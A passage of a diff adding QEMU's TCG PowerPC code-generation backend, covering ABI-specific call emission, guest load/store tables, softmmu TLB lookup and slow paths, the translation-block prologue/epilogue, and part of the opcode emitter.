tcg_out_call(TCGContext *s, tcg_insn_unit *target) +{ +#ifdef _CALL_AIX + /* Look through the descriptor. If the branch is in range, and we + don't have to spend too much effort on building the toc. */ + void *tgt = ((void **)target)[0]; + uintptr_t toc = ((uintptr_t *)target)[1]; + intptr_t diff = tcg_pcrel_diff(s, tgt); + + if (in_range_b(diff) && toc == (uint32_t)toc) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP1, toc); + tcg_out_b(s, LK, tgt); + } else { + /* Fold the low bits of the constant into the addresses below. */ + intptr_t arg = (intptr_t)target; + int ofs = (int16_t)arg; + + if (ofs + 8 < 0x8000) { + arg -= ofs; + } else { + ofs = 0; + } + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP1, arg); + tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R0, TCG_REG_TMP1, ofs); + tcg_out32(s, MTSPR | RA(TCG_REG_R0) | CTR); + tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R2, TCG_REG_TMP1, ofs + SZP); + tcg_out32(s, BCCTR | BO_ALWAYS | LK); + } +#elif defined(_CALL_ELF) && _CALL_ELF == 2 + intptr_t diff; + + /* In the ELFv2 ABI, we have to set up r12 to contain the destination + address, which the callee uses to compute its TOC address. */ + /* FIXME: when the branch is in range, we could avoid r12 load if we + knew that the destination uses the same TOC, and what its local + entry point offset is. */ + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R12, (intptr_t)target); + + diff = tcg_pcrel_diff(s, target); + if (in_range_b(diff)) { + tcg_out_b(s, LK, target); + } else { + tcg_out32(s, MTSPR | RS(TCG_REG_R12) | CTR); + tcg_out32(s, BCCTR | BO_ALWAYS | LK); + } +#else + tcg_out_b(s, LK, target); +#endif +} + +static const uint32_t qemu_ldx_opc[16] = { + [MO_UB] = LBZX, + [MO_UW] = LHZX, + [MO_UL] = LWZX, + [MO_Q] = LDX, + [MO_SW] = LHAX, + [MO_SL] = LWAX, + [MO_BSWAP | MO_UB] = LBZX, + [MO_BSWAP | MO_UW] = LHBRX, + [MO_BSWAP | MO_UL] = LWBRX, + [MO_BSWAP | MO_Q] = LDBRX, +}; + +static const uint32_t qemu_stx_opc[16] = { + [MO_UB] = STBX, + [MO_UW] = STHX, + [MO_UL] = STWX, + [MO_Q] = STDX, + [MO_BSWAP | MO_UB] = STBX, + [MO_BSWAP | MO_UW] = STHBRX, + [MO_BSWAP | MO_UL] = STWBRX, + [MO_BSWAP | MO_Q] = STDBRX, +}; + +static const uint32_t qemu_exts_opc[4] = { + EXTSB, EXTSH, EXTSW, 0 +}; + +#if defined (CONFIG_SOFTMMU) +/* helper signature: helper_ld_mmu(CPUState *env, target_ulong addr, + * int mmu_idx, uintptr_t ra) + */ +static void * const qemu_ld_helpers[16] = { + [MO_UB] = helper_ret_ldub_mmu, + [MO_LEUW] = helper_le_lduw_mmu, + [MO_LEUL] = helper_le_ldul_mmu, + [MO_LEQ] = helper_le_ldq_mmu, + [MO_BEUW] = helper_be_lduw_mmu, + [MO_BEUL] = helper_be_ldul_mmu, + [MO_BEQ] = helper_be_ldq_mmu, +}; + +/* helper signature: helper_st_mmu(CPUState *env, target_ulong addr, + * uintxx_t val, int mmu_idx, uintptr_t ra) + */ +static void * const qemu_st_helpers[16] = { + [MO_UB] = helper_ret_stb_mmu, + [MO_LEUW] = helper_le_stw_mmu, + [MO_LEUL] = helper_le_stl_mmu, + [MO_LEQ] = helper_le_stq_mmu, + [MO_BEUW] = helper_be_stw_mmu, + [MO_BEUL] = helper_be_stl_mmu, + [MO_BEQ] = helper_be_stq_mmu, +}; + +/* Perform the TLB load and compare. Places the result of the comparison + in CR7, loads the addend of the TLB into R3, and returns the register + containing the guest address (zero-extended into R4). Clobbers R0 and R2. */ + +static TCGReg tcg_out_tlb_read(TCGContext *s, TCGMemOp s_bits, + TCGReg addrlo, TCGReg addrhi, + int mem_index, bool is_read) +{ + int cmp_off + = (is_read + ? offsetof(CPUArchState, tlb_table[mem_index][0].addr_read) + : offsetof(CPUArchState, tlb_table[mem_index][0].addr_write)); + int add_off = offsetof(CPUArchState, tlb_table[mem_index][0].addend); + TCGReg base = TCG_AREG0; + + /* Extract the page index, shifted into place for tlb index. */ + if (TCG_TARGET_REG_BITS == 64) { + if (TARGET_LONG_BITS == 32) { + /* Zero-extend the address into a place helpful for further use. */ + tcg_out_ext32u(s, TCG_REG_R4, addrlo); + addrlo = TCG_REG_R4; + } else { + tcg_out_rld(s, RLDICL, TCG_REG_R3, addrlo, + 64 - TARGET_PAGE_BITS, 64 - CPU_TLB_BITS); + } + } + + /* Compensate for very large offsets. */ + if (add_off >= 0x8000) { + /* Most target env are smaller than 32k; none are larger than 64k. + Simplify the logic here merely to offset by 0x7ff0, giving us a + range just shy of 64k. Check this assumption. */ + QEMU_BUILD_BUG_ON(offsetof(CPUArchState, + tlb_table[NB_MMU_MODES - 1][1]) + > 0x7ff0 + 0x7fff); + tcg_out32(s, ADDI | TAI(TCG_REG_TMP1, base, 0x7ff0)); + base = TCG_REG_TMP1; + cmp_off -= 0x7ff0; + add_off -= 0x7ff0; + } + + /* Extraction and shifting, part 2. */ + if (TCG_TARGET_REG_BITS == 32 || TARGET_LONG_BITS == 32) { + tcg_out_rlw(s, RLWINM, TCG_REG_R3, addrlo, + 32 - (TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS), + 32 - (CPU_TLB_BITS + CPU_TLB_ENTRY_BITS), + 31 - CPU_TLB_ENTRY_BITS); + } else { + tcg_out_shli64(s, TCG_REG_R3, TCG_REG_R3, CPU_TLB_ENTRY_BITS); + } + + tcg_out32(s, ADD | TAB(TCG_REG_R3, TCG_REG_R3, base)); + + /* Load the tlb comparator. */ + if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { + tcg_out_ld(s, TCG_TYPE_I32, TCG_REG_R4, TCG_REG_R3, cmp_off); + tcg_out_ld(s, TCG_TYPE_I32, TCG_REG_TMP1, TCG_REG_R3, cmp_off + 4); + } else { + tcg_out_ld(s, TCG_TYPE_TL, TCG_REG_TMP1, TCG_REG_R3, cmp_off); + } + + /* Load the TLB addend for use on the fast path. Do this asap + to minimize any load use delay. */ + tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R3, TCG_REG_R3, add_off); + + /* Clear the non-page, non-alignment bits from the address. */ + if (TCG_TARGET_REG_BITS == 32 || TARGET_LONG_BITS == 32) { + tcg_out_rlw(s, RLWINM, TCG_REG_R0, addrlo, 0, + (32 - s_bits) & 31, 31 - TARGET_PAGE_BITS); + } else if (!s_bits) { + tcg_out_rld(s, RLDICR, TCG_REG_R0, addrlo, + 0, 63 - TARGET_PAGE_BITS); + } else { + tcg_out_rld(s, RLDICL, TCG_REG_R0, addrlo, + 64 - TARGET_PAGE_BITS, TARGET_PAGE_BITS - s_bits); + tcg_out_rld(s, RLDICL, TCG_REG_R0, TCG_REG_R0, TARGET_PAGE_BITS, 0); + } + + if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { + tcg_out_cmp(s, TCG_COND_EQ, TCG_REG_R0, TCG_REG_TMP1, + 0, 7, TCG_TYPE_I32); + tcg_out_cmp(s, TCG_COND_EQ, addrhi, TCG_REG_R4, 0, 6, TCG_TYPE_I32); + tcg_out32(s, CRAND | BT(7, CR_EQ) | BA(6, CR_EQ) | BB(7, CR_EQ)); + } else { + tcg_out_cmp(s, TCG_COND_EQ, TCG_REG_R0, TCG_REG_TMP1, + 0, 7, TCG_TYPE_TL); + } + + return addrlo; +} + +/* Record the context of a call to the out of line helper code for the slow + path for a load or store, so that we can later generate the correct + helper code. */ +static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOp opc, + TCGReg datalo_reg, TCGReg datahi_reg, + TCGReg addrlo_reg, TCGReg addrhi_reg, + int mem_index, tcg_insn_unit *raddr, + tcg_insn_unit *lptr) +{ + TCGLabelQemuLdst *label = new_ldst_label(s); + + label->is_ld = is_ld; + label->opc = opc; + label->datalo_reg = datalo_reg; + label->datahi_reg = datahi_reg; + label->addrlo_reg = addrlo_reg; + label->addrhi_reg = addrhi_reg; + label->mem_index = mem_index; + label->raddr = raddr; + label->label_ptr[0] = lptr; +} + +static void tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) +{ + TCGMemOp opc = lb->opc; + TCGReg hi, lo, arg = TCG_REG_R3; + + reloc_pc14(lb->label_ptr[0], s->code_ptr); + + tcg_out_mov(s, TCG_TYPE_PTR, arg++, TCG_AREG0); + + lo = lb->addrlo_reg; + hi = lb->addrhi_reg; + if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { +#ifdef TCG_TARGET_CALL_ALIGN_ARGS + arg |= 1; +#endif + tcg_out_mov(s, TCG_TYPE_I32, arg++, hi); + tcg_out_mov(s, TCG_TYPE_I32, arg++, lo); + } else { + /* If the address needed to be zero-extended, we'll have already + placed it in R4. The only remaining case is 64-bit guest. */ + tcg_out_mov(s, TCG_TYPE_TL, arg++, lo); + } + + tcg_out_movi(s, TCG_TYPE_I32, arg++, lb->mem_index); + tcg_out32(s, MFSPR | RT(arg) | LR); + + tcg_out_call(s, qemu_ld_helpers[opc & ~MO_SIGN]); + + lo = lb->datalo_reg; + hi = lb->datahi_reg; + if (TCG_TARGET_REG_BITS == 32 && (opc & MO_SIZE) == MO_64) { + tcg_out_mov(s, TCG_TYPE_I32, lo, TCG_REG_R4); + tcg_out_mov(s, TCG_TYPE_I32, hi, TCG_REG_R3); + } else if (opc & MO_SIGN) { + uint32_t insn = qemu_exts_opc[opc & MO_SIZE]; + tcg_out32(s, insn | RA(lo) | RS(TCG_REG_R3)); + } else { + tcg_out_mov(s, TCG_TYPE_REG, lo, TCG_REG_R3); + } + + tcg_out_b(s, 0, lb->raddr); +} + +static void tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) +{ + TCGMemOp opc = lb->opc; + TCGMemOp s_bits = opc & MO_SIZE; + TCGReg hi, lo, arg = TCG_REG_R3; + + reloc_pc14(lb->label_ptr[0], s->code_ptr); + + tcg_out_mov(s, TCG_TYPE_PTR, arg++, TCG_AREG0); + + lo = lb->addrlo_reg; + hi = lb->addrhi_reg; + if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { +#ifdef TCG_TARGET_CALL_ALIGN_ARGS + arg |= 1; +#endif + tcg_out_mov(s, TCG_TYPE_I32, arg++, hi); + tcg_out_mov(s, TCG_TYPE_I32, arg++, lo); + } else { + /* If the address needed to be zero-extended, we'll have already + placed it in R4. The only remaining case is 64-bit guest. */ + tcg_out_mov(s, TCG_TYPE_TL, arg++, lo); + } + + lo = lb->datalo_reg; + hi = lb->datahi_reg; + if (TCG_TARGET_REG_BITS == 32) { + switch (s_bits) { + case MO_64: +#ifdef TCG_TARGET_CALL_ALIGN_ARGS + arg |= 1; +#endif + tcg_out_mov(s, TCG_TYPE_I32, arg++, hi); + /* FALLTHRU */ + case MO_32: + tcg_out_mov(s, TCG_TYPE_I32, arg++, lo); + break; + default: + tcg_out_rlw(s, RLWINM, arg++, lo, 0, 32 - (8 << s_bits), 31); + break; + } + } else { + if (s_bits == MO_64) { + tcg_out_mov(s, TCG_TYPE_I64, arg++, lo); + } else { + tcg_out_rld(s, RLDICL, arg++, lo, 0, 64 - (8 << s_bits)); + } + } + + tcg_out_movi(s, TCG_TYPE_I32, arg++, lb->mem_index); + tcg_out32(s, MFSPR | RT(arg) | LR); + + tcg_out_call(s, qemu_st_helpers[opc]); + + tcg_out_b(s, 0, lb->raddr); +} +#endif /* SOFTMMU */ + +static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is_64) +{ + TCGReg datalo, datahi, addrlo, rbase; + TCGReg addrhi QEMU_UNUSED_VAR; + TCGMemOp opc, s_bits; +#ifdef CONFIG_SOFTMMU + int mem_index; + tcg_insn_unit *label_ptr; +#endif + + datalo = *args++; + datahi = (TCG_TARGET_REG_BITS == 32 && is_64 ? *args++ : 0); + addrlo = *args++; + addrhi = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? *args++ : 0); + opc = *args++; + s_bits = opc & MO_SIZE; + +#ifdef CONFIG_SOFTMMU + mem_index = *args; + addrlo = tcg_out_tlb_read(s, s_bits, addrlo, addrhi, mem_index, true); + + /* Load a pointer into the current opcode w/conditional branch-link. */ + label_ptr = s->code_ptr; + tcg_out_bc_noaddr(s, BC | BI(7, CR_EQ) | BO_COND_FALSE | LK); + + rbase = TCG_REG_R3; +#else /* !CONFIG_SOFTMMU */ + rbase = GUEST_BASE ? TCG_GUEST_BASE_REG : 0; + if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { + tcg_out_ext32u(s, TCG_REG_TMP1, addrlo); + addrlo = TCG_REG_TMP1; + } +#endif + + if (TCG_TARGET_REG_BITS == 32 && s_bits == MO_64) { + if (opc & MO_BSWAP) { + tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4)); + tcg_out32(s, LWBRX | TAB(datalo, rbase, addrlo)); + tcg_out32(s, LWBRX | TAB(datahi, rbase, TCG_REG_R0)); + } else if (rbase != 0) { + tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4)); + tcg_out32(s, LWZX | TAB(datahi, rbase, addrlo)); + tcg_out32(s, LWZX | TAB(datalo, rbase, TCG_REG_R0)); + } else if (addrlo == datahi) { + tcg_out32(s, LWZ | TAI(datalo, addrlo, 4)); + tcg_out32(s, LWZ | TAI(datahi, addrlo, 0)); + } else { + tcg_out32(s, LWZ | TAI(datahi, addrlo, 0)); + tcg_out32(s, LWZ | TAI(datalo, addrlo, 4)); + } + } else { + uint32_t insn = qemu_ldx_opc[opc]; + if (!HAVE_ISA_2_06 && insn == LDBRX) { + tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4)); + tcg_out32(s, LWBRX | TAB(datalo, rbase, addrlo)); + tcg_out32(s, LWBRX | TAB(TCG_REG_R0, rbase, TCG_REG_R0)); + tcg_out_rld(s, RLDIMI, datalo, TCG_REG_R0, 32, 0); + } else if (insn) { + tcg_out32(s, insn | TAB(datalo, rbase, addrlo)); + } else { + insn = qemu_ldx_opc[opc & (MO_SIZE | MO_BSWAP)]; + tcg_out32(s, insn | TAB(datalo, rbase, addrlo)); + insn = qemu_exts_opc[s_bits]; + tcg_out32(s, insn | RA(datalo) | RS(datalo)); + } + } + +#ifdef CONFIG_SOFTMMU + add_qemu_ldst_label(s, true, opc, datalo, datahi, addrlo, addrhi, + mem_index, s->code_ptr, label_ptr); +#endif +} + +static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is_64) +{ + TCGReg datalo, datahi, addrlo, rbase; + TCGReg addrhi QEMU_UNUSED_VAR; + TCGMemOp opc, s_bits; +#ifdef CONFIG_SOFTMMU + int mem_index; + tcg_insn_unit *label_ptr; +#endif + + datalo = *args++; + datahi = (TCG_TARGET_REG_BITS == 32 && is_64 ? *args++ : 0); + addrlo = *args++; + addrhi = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? *args++ : 0); + opc = *args++; + s_bits = opc & MO_SIZE; + +#ifdef CONFIG_SOFTMMU + mem_index = *args; + addrlo = tcg_out_tlb_read(s, s_bits, addrlo, addrhi, mem_index, false); + + /* Load a pointer into the current opcode w/conditional branch-link. */ + label_ptr = s->code_ptr; + tcg_out_bc_noaddr(s, BC | BI(7, CR_EQ) | BO_COND_FALSE | LK); + + rbase = TCG_REG_R3; +#else /* !CONFIG_SOFTMMU */ + rbase = GUEST_BASE ? TCG_GUEST_BASE_REG : 0; + if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { + tcg_out_ext32u(s, TCG_REG_TMP1, addrlo); + addrlo = TCG_REG_TMP1; + } +#endif + + if (TCG_TARGET_REG_BITS == 32 && s_bits == MO_64) { + if (opc & MO_BSWAP) { + tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4)); + tcg_out32(s, STWBRX | SAB(datalo, rbase, addrlo)); + tcg_out32(s, STWBRX | SAB(datahi, rbase, TCG_REG_R0)); + } else if (rbase != 0) { + tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4)); + tcg_out32(s, STWX | SAB(datahi, rbase, addrlo)); + tcg_out32(s, STWX | SAB(datalo, rbase, TCG_REG_R0)); + } else { + tcg_out32(s, STW | TAI(datahi, addrlo, 0)); + tcg_out32(s, STW | TAI(datalo, addrlo, 4)); + } + } else { + uint32_t insn = qemu_stx_opc[opc]; + if (!HAVE_ISA_2_06 && insn == STDBRX) { + tcg_out32(s, STWBRX | SAB(datalo, rbase, addrlo)); + tcg_out32(s, ADDI | TAI(TCG_REG_TMP1, addrlo, 4)); + tcg_out_shri64(s, TCG_REG_R0, datalo, 32); + tcg_out32(s, STWBRX | SAB(TCG_REG_R0, rbase, TCG_REG_TMP1)); + } else { + tcg_out32(s, insn | SAB(datalo, rbase, addrlo)); + } + } + +#ifdef CONFIG_SOFTMMU + add_qemu_ldst_label(s, false, opc, datalo, datahi, addrlo, addrhi, + mem_index, s->code_ptr, label_ptr); +#endif +} + +/* Parameters for function call generation, used in tcg.c. */ +#define TCG_TARGET_STACK_ALIGN 16 +#define TCG_TARGET_EXTEND_ARGS 1 + +#ifdef _CALL_AIX +# define LINK_AREA_SIZE (6 * SZR) +# define LR_OFFSET (1 * SZR) +# define TCG_TARGET_CALL_STACK_OFFSET (LINK_AREA_SIZE + 8 * SZR) +#elif defined(TCG_TARGET_CALL_DARWIN) +# define LINK_AREA_SIZE (6 * SZR) +# define LR_OFFSET (2 * SZR) +#elif TCG_TARGET_REG_BITS == 64 +# if defined(_CALL_ELF) && _CALL_ELF == 2 +# define LINK_AREA_SIZE (4 * SZR) +# define LR_OFFSET (1 * SZR) +# endif +#else /* TCG_TARGET_REG_BITS == 32 */ +# if defined(_CALL_SYSV) +# define LINK_AREA_SIZE (2 * SZR) +# define LR_OFFSET (1 * SZR) +# endif +#endif +#ifndef LR_OFFSET +# error "Unhandled abi" +#endif +#ifndef TCG_TARGET_CALL_STACK_OFFSET +# define TCG_TARGET_CALL_STACK_OFFSET LINK_AREA_SIZE +#endif + +#define CPU_TEMP_BUF_SIZE (CPU_TEMP_BUF_NLONGS * (int)sizeof(long)) +#define REG_SAVE_SIZE ((int)ARRAY_SIZE(tcg_target_callee_save_regs) * SZR) + +#define FRAME_SIZE ((TCG_TARGET_CALL_STACK_OFFSET \ + + TCG_STATIC_CALL_ARGS_SIZE \ + + CPU_TEMP_BUF_SIZE \ + + REG_SAVE_SIZE \ + + TCG_TARGET_STACK_ALIGN - 1) \ + & -TCG_TARGET_STACK_ALIGN) + +#define REG_SAVE_BOT (FRAME_SIZE - REG_SAVE_SIZE) + +static void tcg_target_qemu_prologue(TCGContext *s) +{ + int i; + +#ifdef _CALL_AIX + void **desc = (void **)s->code_ptr; + desc[0] = desc + 2; /* entry point */ + desc[1] = 0; /* environment pointer */ + s->code_ptr = (void *)(desc + 2); /* skip over descriptor */ +#endif + + tcg_set_frame(s, TCG_REG_CALL_STACK, REG_SAVE_BOT - CPU_TEMP_BUF_SIZE, + CPU_TEMP_BUF_SIZE); + + /* Prologue */ + tcg_out32(s, MFSPR | RT(TCG_REG_R0) | LR); + tcg_out32(s, (SZR == 8 ? STDU : STWU) + | SAI(TCG_REG_R1, TCG_REG_R1, -FRAME_SIZE)); + + for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); ++i) { + tcg_out_st(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i], + TCG_REG_R1, REG_SAVE_BOT + i * SZR); + } + tcg_out_st(s, TCG_TYPE_PTR, TCG_REG_R0, TCG_REG_R1, FRAME_SIZE+LR_OFFSET); + +#ifdef CONFIG_USE_GUEST_BASE + if (GUEST_BASE) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, GUEST_BASE); + tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); + } +#endif + + tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); + tcg_out32(s, MTSPR | RS(tcg_target_call_iarg_regs[1]) | CTR); + + if (USE_REG_RA) { +#ifdef _CALL_AIX + /* Make the caller load the value as the TOC into R2. */ + tb_ret_addr = s->code_ptr + 2; + desc[1] = tb_ret_addr; + tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_RA, TCG_REG_R2); + tcg_out32(s, BCCTR | BO_ALWAYS); +#elif defined(_CALL_ELF) && _CALL_ELF == 2 + /* Compute from the incoming R12 value. */ + tb_ret_addr = s->code_ptr + 2; + tcg_out32(s, ADDI | TAI(TCG_REG_RA, TCG_REG_R12, + tcg_ptr_byte_diff(tb_ret_addr, s->code_buf))); + tcg_out32(s, BCCTR | BO_ALWAYS); +#else + /* Reserve max 5 insns for the constant load. */ + tb_ret_addr = s->code_ptr + 6; + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_RA, (intptr_t)tb_ret_addr); + tcg_out32(s, BCCTR | BO_ALWAYS); + while (s->code_ptr < tb_ret_addr) { + tcg_out32(s, NOP); + } +#endif + } else { + tcg_out32(s, BCCTR | BO_ALWAYS); + tb_ret_addr = s->code_ptr; + } + + /* Epilogue */ + assert(tb_ret_addr == s->code_ptr); + + tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R0, TCG_REG_R1, FRAME_SIZE+LR_OFFSET); + for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); ++i) { + tcg_out_ld(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i], + TCG_REG_R1, REG_SAVE_BOT + i * SZR); + } + tcg_out32(s, MTSPR | RS(TCG_REG_R0) | LR); + tcg_out32(s, ADDI | TAI(TCG_REG_R1, TCG_REG_R1, FRAME_SIZE)); + tcg_out32(s, BCLR | BO_ALWAYS); +} + +static void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, + const int *const_args) +{ + TCGArg a0, a1, a2; + int c; + + switch (opc) { + case INDEX_op_exit_tb: + if (USE_REG_RA) { + ptrdiff_t disp = tcg_pcrel_diff(s, tb_ret_addr); + + /* If we can use a direct branch, otherwise use the value in RA. + Note that the direct branch is always forward. If it's in + range now, it'll still be in range after the movi. Don't + bother about the 20 bytes where the test here fails but it + would succeed below. */ + if (!in_range_b(disp)) { + tcg_out32(s, MTSPR | RS(TCG_REG_RA) | CTR); + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R3, args[0]); + tcg_out32(s, BCCTR | BO_ALWAYS); + break; + } + } + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R3, args[0]); + tcg_out_b(s, 0, tb_ret_addr); + break; + case INDEX_op_goto_tb: + if (s->tb_jmp_offset) { + /* Direct jump method. */ + s->tb_jmp_offset[args[0]] = tcg_current_code_size(s); + s->code_ptr += 7; + } else { + /* Indirect jump method. */ + tcg_abort(); + } + s->tb_next_offset[args[0]] = tcg_current_code_size(s); + break; + case INDEX_op_br: + { + TCGLabel *l = &s->labels[args[0]]; + + if (l->has_value) { + tcg_out_b(s, 0, l->u.value_ptr); + } else { + tcg_out_reloc(s, s->code_ptr, R_PPC_REL24, args[0], 0); + tcg_out_b_noaddr(s, B); + } + } + break; + case INDEX_op_ld8u_i32: + case INDEX_op_ld8u_i64: + tcg_out_mem_long(s, LBZ, LBZX, args[0], args[1], args[2]); + break; + case INDEX_op_ld8s_i32: + case INDEX_op_ld8s_i64: + tcg_out_mem_long(s, LBZ, LBZX, args[0], args[1], args[2]); + tcg_out32(s, EXTSB | RS(args[0]) | RA(args[0])); + break; + case INDEX_op_ld16u_i32: + case INDEX_op_ld16u_i64: + tcg_out_mem_long(s, LHZ, LHZX, args[0], args[1], args[2]); + break; + case INDEX_op_ld16s_i32: + case INDEX_op_ld16s_i64: + tcg_out_mem_long(s, LHA, LHAX, args[0], args[1], args[2]); + break; + case INDEX_op_ld_i32: + case INDEX_op_ld32u_i64: + tcg_out_mem_long(s, LWZ, LWZX, args[0], args[1], args[2]); + break; + case INDEX_op_ld32s_i64: + tcg_out_mem_long(s, LWA, LWAX, args[0], args[1], args[2]); + break; + case INDEX_op_ld_i64: + tcg_out_mem_long(s, LD, LDX, args[0], args[1], args[2]); + break; + case INDEX_op_st8_i32: + case INDEX_op_st8_i64: + tcg_out_mem_long(s, STB, STBX, args[0], args[1], args[2]); + break; + case INDEX_op_st16_i32: + case INDEX_op_st16_i64: + tcg_out_mem_long(s, STH, STHX, args[0], args[1], args[2]); + break; + case INDEX_op_st_i32: + case INDEX_op_st32_i64: + tcg_out_mem_long(s, STW, STWX, args[0], args[1], args[2]); + break; + case INDEX_op_st_i64: + tcg_out_mem_long(s, STD, STDX, args[0], args[1], args[2]); + break; + + case INDEX_op_add_i32: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + do_addi_32: + tcg_out_mem_long(s, ADDI, ADD, a0, a1, (int32_t)a2); + } else { + tcg_out32(s, ADD | TAB(a0, a1, a2)); + } + break; + case INDEX_op_sub_i32: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[1]) { + if (const_args[2]) { + tcg_out_movi(s, TCG_TYPE_I32, a0, a1 - a2); + } else { + tcg_out32(s, SUBFIC | TAI(a0, a2, a1)); + } + } else if (const_args[2]) { + a2 = -a2; + goto do_addi_32; + } else { + tcg_out32(s, SUBF | TAB(a0, a2, a1)); + } + break; + + case INDEX_op_and_i32: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out_andi32(s, a0, a1, a2); + } else { + tcg_out32(s, AND | SAB(a1, a0, a2)); + } + break; + case INDEX_op_and_i64: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out_andi64(s, a0, a1, a2); + } else { + tcg_out32(s, AND | SAB(a1, a0, a2)); + } + break; + case INDEX_op_or_i64: + case INDEX_op_or_i32: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out_ori32(s, a0, a1, a2); + } else { + tcg_out32(s, OR | SAB(a1, a0, a2)); + } + break; + case INDEX_op_xor_i64: + case INDEX_op_xor_i32: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out_xori32(s, a0, a1, a2); + } else { + tcg_out32(s, XOR | SAB(a1, a0, a2)); + } + break; + case INDEX_op_andc_i32: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out_andi32(s, a0, a1, ~a2); + } else { + tcg_out32(s, ANDC | SAB(a1, a0, a2)); + } + break; + case INDEX_op_andc_i64: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out_andi64(s, a0, a1, ~a2); + } else { + tcg_out32(s, ANDC | SAB(a1, a0, a2)); + } + break; + case INDEX_op_orc_i32: + if (const_args[2]) { + tcg_out_ori32(s, args[0], args[1], ~args[2]); + break; + } + /* FALLTHRU */ + case INDEX_op_orc_i64: + tcg_out32(s, ORC | SAB(args[1], args[0], args[2])); + break; + case INDEX_op_eqv_i32: + if (const_args[2]) { + tcg_out_xori32(s, args[0], args[1], ~args[2]); + break; + } + /* FALLTHRU */ + case INDEX_op_eqv_i64: + tcg_out32(s, EQV | SAB(args[1], args[0], args[2])); + break; + case INDEX_op_nand_i32: + case INDEX_op_nand_i64: + tcg_out32(s, NAND | SAB(args[1], args[0], args[2])); + break; + case INDEX_op_nor_i32: + case INDEX_op_nor_i64: + tcg_out32(s, NOR | SAB(args[1], args[0], args[2])); + break; + + case INDEX_op_mul_i32: + a0 = args[0], a1 = args[1], a2 = args[2]; + if (const_args[2]) { + tcg_out32(s, MULLI | TAI(a0, a1, a2)); + } else { + tcg_out32(s, MULLW | TAB(a0, a1, a2)); + } + break; + + case INDEX_op_div_i32: + tcg_out32(s, DIVW | TAB(args[0], args[1], args[2])); + break; + + case INDEX_op_divu_i32: + tcg_out32(s, DIVWU | TAB(args[0], args[1], args[2])); + break; + + case INDEX_op_shl_i32: + if (const_args[2]) { + tcg_out_shli32(s, args[0], args[1], args[2]); + } else { + tcg_out32(s, SLW | SAB(args[1], args[0], args[2])); + } + break; + case INDEX_op_shr_i32: + if (const_args[2]) { + tcg_out_shri32(s, args[0], args[1], args[2]); + } else { + tcg_out32(s, SRW | SAB(args[1], args[0], args[2])); + } + break; + case INDEX_op_sar_i32: + if (const_args[2]) { + tcg_out32(s, SRAWI | RS(args[1]) | RA(args[0]) | SH(args[2])); + } else { + tcg_out32(s, SRAW | SAB(args[1], args[0], args[2])); + } + break; + case INDEX_op_rotl_i32: + if (const_args[2]) { + tcg_out_rlw(s, RLWINM, args[0], args[1], args[2], 0, 31); + } else { + tcg_out32(s, RLWNM | SAB(args[1], args[0], args[2]) + | MB(0) | ME(31)); + } + break; + case INDEX_op_rotr_i32: + if (const_args[2]) { + tcg_out_rlw(s, RLWINM, args[0], args[1], 32 - args[2], 0, 31); + } else { + tcg_out32(s, SUBFIC | TAI(TCG_REG_R0, args[2], 32)); + tcg_out32(s, RLWNM | SAB(args[1], args[0], TCG_REG_R0) + | MB(0) | ME(31)); + } + break; + + case INDEX_op_brcond_i32: + tcg_out_brcond(s, args[2], args[0], args[1], const_args[1], + args[3], TCG_TYPE_I32); + break; + case INDEX_op_brcond_i64: + tcg_out_brcond(s, args[2], args[0], args[1], const_args[1], + args[3], TCG_TYPE_I64); + break; + case INDEX_op_brcond2_i32: + tcg_out_brcond2(s, args, const_args); + break; + + case INDEX_op_neg_i32: + case INDEX_op_neg_i64: + tcg_out32(s, NEG | RT(args[0]) | RA(args[1])); + break; + + case INDEX_op_not_i32: + case INDEX_op_not_i64: + tcg_out32(s, NOR | SAB(args[1], args[0], 